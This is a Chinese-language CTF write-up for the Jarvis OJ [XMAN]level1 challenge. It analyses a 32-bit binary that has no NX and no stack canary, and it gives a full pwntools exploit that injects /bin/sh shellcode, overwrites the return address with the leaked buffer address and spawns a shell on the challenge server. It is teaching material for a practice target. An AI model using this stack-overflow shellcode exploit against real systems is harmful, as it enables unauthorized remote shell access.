Jarvis OJ - [XMAN]level1 - Writeup

Jarvis OJ - [XMAN]level1 - Writeup

M4x原创,转载请表明出处http://www.cnblogs.com/WangAoBo/p/7594173.html

题目:

Jarvis OJ - [XMAN]level1 - Writeup_第1张图片

分析

  • checksec检查保护机制如下,NX没开,可以通过执行shellcode来get shell

    Jarvis OJ - [XMAN]level1 - Writeup_第2张图片

  • 拖到IDA中,查看函数的流程,vulnerable_function函数打印了缓冲区的起始地址,read可以读取0x100个字符,而buf到ret的偏移为0x88 + 0x4 < 0x100,而该elf又是No canary found。

    Jarvis OJ - [XMAN]level1 - Writeup_第3张图片

    Jarvis OJ - [XMAN]level1 - Writeup_第4张图片

  • 整理一下现有的信息:

    • 长度为0x100的缓冲区
    • 缓冲区的起始地址
    • 没有打开栈保护和NX保护

    因此,可以把shellcode填到以buf为起始地址的缓冲区里,并控制vulnerable_function返回到shellcode,就可以通过执行shellcode拿到shell,如下图

  • Jarvis OJ - [XMAN]level1 - Writeup_第5张图片

步骤

  • 经过如上分析,写出exp如下:

 1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = 'M4x'
 4 
 5 from pwn import *
 6 context(log_level = 'debug', arch = 'i386', os = 'linux')
 7 
 8 shellcode = asm(shellcraft.sh())
 9 #  io = process('./level1')
10 io = remote('pwn2.jarvisoj.com', 9877)
11 text = io.recvline()[14: -2]
12 #  print text[14:-2]
13 buf_addr = int(text, 16)
14 
15 payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
16 io.send(payload)
17 io.interactive()
18 io.close()

 

 

运行exp,拿到flag

Jarvis OJ - [XMAN]level1 - Writeup_第6张图片

 

转载于:https://www.cnblogs.com/WangAoBo/p/7594173.html

你可能感兴趣的:(Jarvis OJ - [XMAN]level1 - Writeup)